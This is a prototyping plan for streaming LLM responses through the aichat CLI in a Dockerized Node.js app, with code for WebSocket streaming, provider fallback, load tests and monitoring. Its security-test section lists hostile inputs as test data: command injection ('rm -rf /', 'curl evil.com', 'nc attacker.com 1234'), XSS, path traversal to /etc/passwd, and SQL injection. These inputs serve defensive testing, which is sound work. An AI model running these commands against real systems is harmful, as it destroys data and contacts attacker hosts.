LLM CLI Integration Prototyping Plan
Generated: 2025-08-05 UTC
Purpose: Systematic approach to prototype and validate LLM CLI integration for Sasha Studio
Target: Docker-based Node.js application with real-time AI chat streaming
Prototype Objectives
- Validate streaming performance - Token-by-token response rendering
- Test multi-provider routing - Fallback mechanisms and cost optimization
- Verify Docker integration - Container setup and security patterns
- Measure error handling - Connection resilience and recovery
- Assess scalability - Concurrent request handling
Prototype Architecture
Phase 1: Core Integration Test (Week 1)
Prototype 1A: Basic CLI Streaming
┌───────────────────┐  spawn()  ┌────────────────┐  stdout  ┌───────────────────┐
│  Node.js API      │──────────►│  AIChat CLI    │─────────►│  WebSocket        │
│  Server           │           │  Process       │          │  Client           │
└───────────────────┘           └────────────────┘          └───────────────────┘
Validation Criteria:
- Token-by-token streaming without blocking
- Process cleanup on connection close
- Error handling for CLI failures
- Memory usage under load
Expected Timeline: 2-3 days
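The core of Prototype 1A can be exercised with a few lines before any WebSocket wiring exists; a minimal sketch (the file name and prompt are illustrative, and the flags mirror those used in Phase 3):
// prototype/basic-stream.js (sketch; file name and prompt are illustrative)
const { spawn } = require('child_process');

// Spawn aichat and relay stdout chunks as they arrive
const child = spawn('aichat', ['-m', 'openai:gpt-4', '--stream', '--no-save', 'Say hello']);

child.stdout.on('data', (chunk) => process.stdout.write(chunk));               // token-by-token output
child.stderr.on('data', (err) => console.error('CLI error:', err.toString()));
child.on('close', (code) => console.log(`\nCLI exited with code ${code}`));

// Simulate a dropped client connection: the CLI process must not be left orphaned
setTimeout(() => child.kill('SIGTERM'), 30000);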
Prototype 1B: Multi-Provider Testing
┌───────────────────┐       ┌────────────────┐
│  Provider Router  │──┬───►│  OpenAI API    │
│  Logic            │  │    │  (via CLI)     │
└───────────────────┘  │    └────────────────┘
                       │
                       ├───►┌────────────────┐
                       │    │  Claude API    │
                       │    │  (via CLI)     │
                       │    └────────────────┘
                       │
                       └───►┌────────────────┐
                            │  Gemini API    │
                            │  (via CLI)     │
                            └────────────────┘
Validation Criteria:
- Automatic fallback when provider fails
- Cost calculation accuracy (see the cost sketch after this list)
- Provider-specific error handling
- Configuration management
Expected Timeline: 2-3 days
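For the cost-accuracy criterion, a simple per-token price table is enough to start; a sketch (the prices are placeholders to be replaced with current provider rate cards, and token counts are approximated from character length):
// prototype/cost-estimate.js (sketch; prices are placeholders, not real rate cards)
const PRICE_PER_1K_TOKENS = {
  'openai:gpt-4': { input: 0.03, output: 0.06 },
  'claude:claude-3-sonnet': { input: 0.003, output: 0.015 },
  'gemini:gemini-pro': { input: 0.0005, output: 0.0015 }
};

// Rough token estimate (~4 characters per token) until real usage data is wired in
const estimateTokens = (text) => Math.ceil(text.length / 4);

function estimateCost(model, prompt, response) {
  const price = PRICE_PER_1K_TOKENS[model];
  if (!price) return null;
  const inputCost = (estimateTokens(prompt) / 1000) * price.input;
  const outputCost = (estimateTokens(response) / 1000) * price.output;
  return inputCost + outputCost;
}

module.exports = { estimateCost };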
Docker Integration Strategy
Phase 2: Container Architecture (Week 1-2)
Dockerfile Prototype
FROM node:20-alpine AS base
# Install AIChat CLI (most comprehensive alternative to LLxprt)
RUN wget https://github.com/sigoden/aichat/releases/latest/download/aichat-v0.30.0-x86_64-unknown-linux-musl.tar.gz \
    && tar -xzf aichat-v0.30.0-x86_64-unknown-linux-musl.tar.gz \
    && mv aichat /usr/local/bin/ \
    && chmod +x /usr/local/bin/aichat \
    && rm aichat-v0.30.0-x86_64-unknown-linux-musl.tar.gz
# Create non-root user for security
RUN addgroup -g 1001 -S nodejs && \
    adduser -S nodejs -u 1001
# Setup configuration directory
RUN mkdir -p /app/.config/aichat && \
    chown -R nodejs:nodejs /app
FROM base AS development
WORKDIR /app
USER nodejs
# Copy package files
COPY --chown=nodejs:nodejs package*.json ./
# Install all dependencies (including devDependencies) for the development stage
RUN npm ci
# Copy source code
COPY --chown=nodejs:nodejs . .
EXPOSE 3000
CMD ["npm", "run", "dev"]
FROM base AS production
WORKDIR /app
USER nodejs
# Copy package files and install production dependencies
COPY --chown=nodejs:nodejs package*.json ./
RUN npm ci --omit=dev
# Copy source code
COPY --chown=nodejs:nodejs . .
EXPOSE 3000
CMD ["node", "server.js"]
Configuration Management
# .config/aichat/config.yaml
model: openai:gpt-4
temperature: 0.7
stream: true
save: false # Don't save conversations to avoid disk bloat
clients:
  - type: openai
    api_key: ${OPENAI_API_KEY}
    api_base: https://api.openai.com/v1
  - type: claude
    api_key: ${ANTHROPIC_API_KEY}
    api_base: https://api.anthropic.com
  - type: gemini
    api_key: ${GOOGLE_API_KEY}
    api_base: https://generativelanguage.googleapis.com
Validation Criteria:
- Secure API key management via environment variables
- Non-root container execution
- Proper file permissions and ownership
- Resource limits and health checks (see the compose sketch after this list)
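A docker-compose service definition is one way to exercise the last two criteria; a sketch (the service name, limit values, and the /health endpoint are illustrative assumptions, not a finalized deployment file):
# docker-compose.yml (sketch; values are illustrative starting points)
services:
  sasha-studio:
    build:
      context: .
      target: production
    ports:
      - "3000:3000"
    environment:
      - OPENAI_API_KEY=${OPENAI_API_KEY}
      - ANTHROPIC_API_KEY=${ANTHROPIC_API_KEY}
      - GOOGLE_API_KEY=${GOOGLE_API_KEY}
    deploy:
      resources:
        limits:
          cpus: "1.0"
          memory: 512M
    healthcheck:
      test: ["CMD", "wget", "-qO-", "http://localhost:3000/health"]
      interval: 30s
      timeout: 5s
      retries: 3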
Streaming Implementation Patterns
Phase 3: Real-Time Communication (Week 2)
WebSocket + CLI Integration
// prototype/streaming-integration.js
const { spawn } = require('child_process');

class StreamingLLMService {
  constructor() {
    this.activeStreams = new Map();
  }

  async startStream(sessionId, message, model = 'openai:gpt-4') {
    const startTime = Date.now();

    // Spawn CLI process with streaming; named `child` so it does not shadow the global `process`
    const child = spawn('aichat', [
      '-m', model,
      '--stream',
      '--no-save',
      message
    ], {
      env: {
        ...process.env,
        AICHAT_CONFIG_DIR: '/app/.config/aichat'
      }
    });

    this.activeStreams.set(sessionId, {
      process: child,
      startTime,
      chunks: 0,
      totalChars: 0
    });

    return child;
  }

  setupWebSocketHandling(wss) {
    wss.on('connection', (ws, req) => {
      const sessionId = req.url.split('session=')[1];

      ws.on('message', async (data) => {
        try {
          const { message, model } = JSON.parse(data);
          const child = await this.startStream(sessionId, message, model);

          // Stream stdout to WebSocket
          child.stdout.on('data', (chunk) => {
            const streamData = this.activeStreams.get(sessionId);
            if (streamData) {
              streamData.chunks++;
              streamData.totalChars += chunk.length;
            }
            ws.send(JSON.stringify({
              type: 'chunk',
              content: chunk.toString(),
              sessionId
            }));
          });

          // Handle completion
          child.on('close', (code) => {
            const streamData = this.activeStreams.get(sessionId);
            const duration = streamData ? Date.now() - streamData.startTime : 0;
            ws.send(JSON.stringify({
              type: 'complete',
              sessionId,
              metadata: {
                duration,
                chunks: streamData?.chunks || 0,
                totalChars: streamData?.totalChars || 0,
                exitCode: code
              }
            }));
            this.activeStreams.delete(sessionId);
          });

          // Error handling
          child.stderr.on('data', (error) => {
            ws.send(JSON.stringify({
              type: 'error',
              error: error.toString(),
              sessionId
            }));
          });
        } catch (error) {
          ws.send(JSON.stringify({
            type: 'error',
            error: error.message,
            sessionId
          }));
        }
      });

      ws.on('close', () => {
        // Clean up any active process for this session
        const streamData = this.activeStreams.get(sessionId);
        if (streamData?.process) {
          streamData.process.kill('SIGTERM');
          this.activeStreams.delete(sessionId);
        }
      });
    });
  }
}

module.exports = { StreamingLLMService };
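A possible server bootstrap around this class (a sketch; it assumes the class is exported as shown above, and the /health route is an assumption added for the container health check):
// prototype/server.js (sketch)
const express = require('express');
const http = require('http');
const { WebSocketServer } = require('ws');
const { StreamingLLMService } = require('./streaming-integration');

const app = express();
app.get('/health', (req, res) => res.json({ status: 'ok' }));

const server = http.createServer(app);
const wss = new WebSocketServer({ server, path: '/ws' });

new StreamingLLMService().setupWebSocketHandling(wss);

server.listen(3000, () => console.log('Streaming prototype listening on :3000'));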
Provider Fallback Logic
// prototype/provider-router.js
const { spawn } = require('child_process');

class ProviderRouter {
  constructor() {
    this.providers = {
      'openai': { models: ['gpt-4', 'gpt-3.5-turbo'], priority: 1 },
      'claude': { models: ['claude-3-sonnet', 'claude-3-haiku'], priority: 2 },
      'gemini': { models: ['gemini-pro'], priority: 3 }
    };
    this.healthStatus = new Map();
    this.lastHealthCheck = new Map();
  }

  async routeRequest(message, preferredProvider = null) {
    const availableProviders = await this.getHealthyProviders();

    if (preferredProvider && availableProviders.includes(preferredProvider)) {
      return this.executeWithProvider(preferredProvider, message);
    }

    // Try providers in priority order
    for (const provider of availableProviders) {
      try {
        return await this.executeWithProvider(provider, message);
      } catch (error) {
        console.warn(`Provider ${provider} failed, trying next:`, error.message);
        this.markProviderUnhealthy(provider);
        continue;
      }
    }

    throw new Error('All providers failed');
  }

  async executeWithProvider(provider, message) {
    const model = `${provider}:${this.providers[provider].models[0]}`;

    return new Promise((resolve, reject) => {
      // Named `child` to avoid shadowing the global `process`
      const child = spawn('aichat', ['-m', model, '--stream', message]);
      let response = '';

      child.stdout.on('data', (chunk) => {
        response += chunk.toString();
      });

      child.on('close', (code) => {
        if (code === 0) {
          this.markProviderHealthy(provider);
          resolve({ provider, model, response });
        } else {
          reject(new Error(`Provider ${provider} exited with code ${code}`));
        }
      });

      child.stderr.on('data', (error) => {
        reject(new Error(`Provider ${provider} error: ${error.toString()}`));
      });
    });
  }

  async getHealthyProviders() {
    const healthy = [];

    for (const provider of Object.keys(this.providers)) {
      if (await this.isProviderHealthy(provider)) {
        healthy.push(provider);
      }
    }

    return healthy.sort((a, b) =>
      this.providers[a].priority - this.providers[b].priority
    );
  }

  async isProviderHealthy(provider) {
    const lastCheck = this.lastHealthCheck.get(provider) || 0;
    const now = Date.now();

    // Cache health status for 5 minutes
    if (now - lastCheck < 5 * 60 * 1000) {
      return this.healthStatus.get(provider) !== false;
    }

    try {
      // Quick health check with a minimal request
      await this.executeWithProvider(provider, 'test');
      this.healthStatus.set(provider, true);
      this.lastHealthCheck.set(provider, now);
      return true;
    } catch (error) {
      this.healthStatus.set(provider, false);
      this.lastHealthCheck.set(provider, now);
      return false;
    }
  }

  markProviderHealthy(provider) {
    this.healthStatus.set(provider, true);
    this.lastHealthCheck.set(provider, Date.now());
  }

  markProviderUnhealthy(provider) {
    this.healthStatus.set(provider, false);
    this.lastHealthCheck.set(provider, Date.now());
  }
}

module.exports = { ProviderRouter };
Validation Criteria:
- Sub-second first token response time
- Smooth streaming without UI blocking
- Graceful WebSocket reconnection (see the client sketch after this list)
- Automatic provider failover
- Memory usage remains stable under load
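The graceful-reconnection criterion can be checked with a small browser-side helper; a sketch (the backoff values are illustrative):
// prototype/client-reconnect.js (sketch; runs in the browser)
function connectWithRetry(sessionId, onChunk, attempt = 0) {
  const ws = new WebSocket(`ws://localhost:3000/ws?session=${sessionId}`);

  ws.onmessage = (event) => {
    const msg = JSON.parse(event.data);
    if (msg.type === 'chunk') onChunk(msg.content);
  };

  ws.onclose = () => {
    // Exponential backoff capped at 5s, matching the < 5 second recovery target
    const delay = Math.min(5000, 500 * 2 ** attempt);
    setTimeout(() => connectWithRetry(sessionId, onChunk, attempt + 1), delay);
  };

  return ws;
}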
Performance Testing Strategy
Phase 4: Load Testing (Week 2-3)
Concurrent Stream Testing
// prototype/load-test.js
const WebSocket = require('ws');

async function loadTest() {
  const concurrentConnections = 10;
  const messagesPerConnection = 5;
  const connections = [];

  console.log('Starting load test...');
  console.log(`Concurrent connections: ${concurrentConnections}`);
  console.log(`Messages per connection: ${messagesPerConnection}`);

  for (let i = 0; i < concurrentConnections; i++) {
    const ws = new WebSocket(`ws://localhost:3000/ws?session=test-${i}`);

    connections.push({
      ws,
      sessionId: `test-${i}`,
      messagesSent: 0,
      responses: [],
      startTime: Date.now()
    });

    ws.on('open', () => {
      console.log(`Connection ${i} opened`);
      sendNextMessage(connections[i]);
    });

    ws.on('message', (data) => {
      const message = JSON.parse(data);
      const conn = connections[i];

      if (message.type === 'complete') {
        conn.responses.push({
          duration: Date.now() - conn.startTime,
          chunks: message.metadata.chunks
        });

        if (conn.messagesSent < messagesPerConnection) {
          setTimeout(() => sendNextMessage(conn), 1000);
        } else {
          ws.close();
        }
      }
    });
  }

  function sendNextMessage(conn) {
    conn.messagesSent++;
    conn.startTime = Date.now();
    conn.ws.send(JSON.stringify({
      message: `Test message ${conn.messagesSent} for load testing`,
      model: 'openai:gpt-3.5-turbo'
    }));
  }
}

loadTest().catch(console.error);
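The records collected above are never reported; a small summary helper could be called once all sockets have closed (a sketch; it expects the connections array built inside loadTest):
// prototype/load-test-report.js (sketch; call summarize(connections) after all sockets close)
function summarize(connections) {
  const durations = connections.flatMap(conn => conn.responses.map(r => r.duration));
  if (durations.length === 0) return console.log('No completed responses recorded');

  durations.sort((a, b) => a - b);
  const avg = durations.reduce((a, b) => a + b, 0) / durations.length;
  const p95 = durations[Math.floor(durations.length * 0.95)];

  console.log(`Completed responses: ${durations.length}`);
  console.log(`Average duration: ${Math.round(avg)} ms`);
  console.log(`p95 duration: ${Math.round(p95)} ms`);
}

module.exports = { summarize };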
Memory and Resource Monitoring
// prototype/monitor.js
class SystemMonitor {
  constructor() {
    this.metrics = {
      memoryUsage: [],
      activeProcesses: 0,
      responseTimeHistory: [],
      errorRate: 0
    };
    this.startMonitoring();
  }

  startMonitoring() {
    setInterval(() => {
      const usage = process.memoryUsage();
      this.metrics.memoryUsage.push({
        timestamp: Date.now(),
        heapUsed: usage.heapUsed / 1024 / 1024,   // MB
        heapTotal: usage.heapTotal / 1024 / 1024, // MB
        external: usage.external / 1024 / 1024    // MB
      });

      // Keep only the last 100 measurements
      if (this.metrics.memoryUsage.length > 100) {
        this.metrics.memoryUsage.shift();
      }
    }, 5000);
  }

  recordResponseTime(duration) {
    this.metrics.responseTimeHistory.push(duration);
    if (this.metrics.responseTimeHistory.length > 1000) {
      this.metrics.responseTimeHistory.shift();
    }
  }

  getAverageResponseTime() {
    if (this.metrics.responseTimeHistory.length === 0) return 0;
    const sum = this.metrics.responseTimeHistory.reduce((a, b) => a + b, 0);
    return sum / this.metrics.responseTimeHistory.length;
  }

  getMemoryTrend() {
    if (this.metrics.memoryUsage.length < 2) return 'stable';
    const recent = this.metrics.memoryUsage.slice(-10);
    const trend = recent[recent.length - 1].heapUsed - recent[0].heapUsed;

    if (trend > 10) return 'increasing';
    if (trend < -10) return 'decreasing';
    return 'stable';
  }
}
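Wiring the monitor into the streaming service is a small change; a sketch (it assumes monitor.js exports SystemMonitor and that the duration from the 'complete' metadata is passed in):
// prototype/monitor-usage.js (sketch; assumes monitor.js exports SystemMonitor via module.exports)
const { SystemMonitor } = require('./monitor');

const monitor = new SystemMonitor();

// In the streaming service, record each completed response, e.g. in the CLI 'close' handler:
//   monitor.recordResponseTime(duration);

// Periodic report against the targets below
setInterval(() => {
  console.log('avg response time (ms):', Math.round(monitor.getAverageResponseTime()));
  console.log('heap trend:', monitor.getMemoryTrend());
}, 60000);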
Performance Targets:
- First Token: < 500ms
- Memory Growth: < 5MB/hour under normal load
- Concurrent Streams: 10+ simultaneous users
- Error Rate: < 1% under normal conditions
- CPU Usage: < 50% during streaming
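The first-token target can be measured directly against the CLI, independent of the WebSocket layer; a sketch (model and prompt are illustrative):
// prototype/latency-check.js (sketch; reports time to the first stdout chunk for one request)
const { spawn } = require('child_process');

function measureFirstToken(model, prompt) {
  return new Promise((resolve, reject) => {
    const start = Date.now();
    const child = spawn('aichat', ['-m', model, '--stream', '--no-save', prompt]);

    child.stdout.once('data', () => resolve(Date.now() - start));
    child.on('error', reject);
    child.on('close', () => reject(new Error('Process closed before any output')));
  });
}

measureFirstToken('openai:gpt-3.5-turbo', 'Reply with one word')
  .then((ms) => console.log(`First token after ${ms} ms (target: < 500 ms)`))
  .catch(console.error);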
Security Validation
Phase 5: Security Testing (Week 3)
Input Sanitization Testing
// prototype/security-tests.js
const WebSocket = require('ws');

const securityTests = [
  // Command injection attempts
  'test; rm -rf /',
  'test && curl evil.com',
  'test | nc attacker.com 1234',
  'test $(wget evil.com)',
  // XSS attempts
  '<script>alert("xss")</script>',
  'javascript:alert(1)',
  // Path traversal
  '../../../etc/passwd',
  '..\\..\\windows\\system32',
  // SQL injection patterns
  "'; DROP TABLE users; --",
  '1 OR 1=1',
  // Extremely long inputs
  'A'.repeat(100000),
  // Special characters
  String.fromCharCode(0, 1, 2, 3, 4, 5)
];

async function runSecurityTests() {
  for (const testInput of securityTests) {
    try {
      console.log(`Testing: ${testInput.substring(0, 50)}...`);

      const ws = new WebSocket('ws://localhost:3000/ws?session=security-test');

      ws.on('open', () => {
        ws.send(JSON.stringify({
          message: testInput,
          model: 'openai:gpt-3.5-turbo'
        }));
      });

      ws.on('message', (data) => {
        const response = JSON.parse(data);
        if (response.type === 'error') {
          console.log('✅ Properly rejected malicious input');
        } else {
          console.log('⚠️ Input was processed - review for security issues');
        }
        ws.close();
      });
    } catch (error) {
      console.log('✅ Input properly rejected:', error.message);
    }

    await new Promise(resolve => setTimeout(resolve, 100));
  }
}

runSecurityTests().catch(console.error);
Security Validation Criteria:
- Command injection prevention
- Input length limits enforced (see the sanitization sketch after this list)
- Special character handling
- Process isolation maintained
- API key exposure prevention
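The tests above only probe the surface; prevention rests on spawning the CLI with an argument array (no shell, so metacharacters are passed to aichat as literal prompt text rather than interpreted) plus validating input before it reaches spawn. A sanitization sketch (the length limit is an illustrative default):
// prototype/sanitize.js (sketch; the 8000-character limit is an illustrative default)
const MAX_MESSAGE_LENGTH = 8000;

function sanitizeMessage(input) {
  if (typeof input !== 'string' || input.length === 0) {
    throw new Error('Message must be a non-empty string');
  }
  if (input.length > MAX_MESSAGE_LENGTH) {
    throw new Error(`Message exceeds ${MAX_MESSAGE_LENGTH} characters`);
  }
  // Strip control characters (including NUL) that should never appear in chat input
  return input.replace(/[\u0000-\u0008\u000B\u000C\u000E-\u001F\u007F]/g, '');
}

module.exports = { sanitizeMessage };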
Success Metrics & KPIs
Technical Performance
- Streaming Latency: First token < 500ms, subsequent tokens < 50ms
- Memory Efficiency: < 100MB base usage, < 5MB growth per hour
- Error Recovery: < 5 second reconnection time
- Process Management: Zero zombie processes after 24h operation
Provider Integration
- Fallback Success Rate: > 99% successful fallback when primary fails
- Cost Accuracy: Β±5% accuracy in cost calculations
- Provider Coverage: Support for 3+ major providers (OpenAI, Anthropic, Google)
Security & Reliability
- Input Validation: 100% malicious input rejection
- Container Security: Non-root execution, minimal privileges
- Audit Logging: Complete request/response logging for compliance
Decision Framework
Prototype Success Criteria
PROCEED with full implementation if:
- All streaming tests pass performance targets
- Provider fallback works reliably
- Security validation shows no vulnerabilities
- Memory usage remains stable under load
- Docker integration is seamless
PIVOT to alternative approach if:
- Streaming latency > 1 second consistently
- Memory leaks detected in 24h testing
- Command injection or security issues found
- Provider fallback fails > 5% of time
- Docker setup is complex or unreliable
ITERATE prototypes if:
- Performance is close but needs optimization
- One provider consistently fails
- Minor security issues that can be fixed
- Docker setup needs refinement
Implementation Timeline
Week 1: Core Prototyping
- Days 1-2: Basic CLI streaming integration
- Days 3-4: Multi-provider testing and fallback
- Days 5-7: Docker container integration and testing
Week 2: Advanced Features
- Days 1-3: WebSocket real-time streaming
- Days 4-5: Load testing and performance optimization
- Days 6-7: Security testing and validation
Week 3: Documentation & Decision
- Days 1-2: Create comprehensive integration guide
- Days 3-4: Document all patterns and lessons learned
- Days 5-7: Final recommendation and next steps
Feedback Loop
After each prototype phase:
- Measure against success criteria
- Document lessons learned
- Identify optimization opportunities
- Update implementation approach
- Create reusable patterns
This prototyping plan provides a systematic path from concept to production-ready implementation, with clear validation criteria and decision points at each phase, so we can commit to the full LLM integration with confidence in our technical decisions.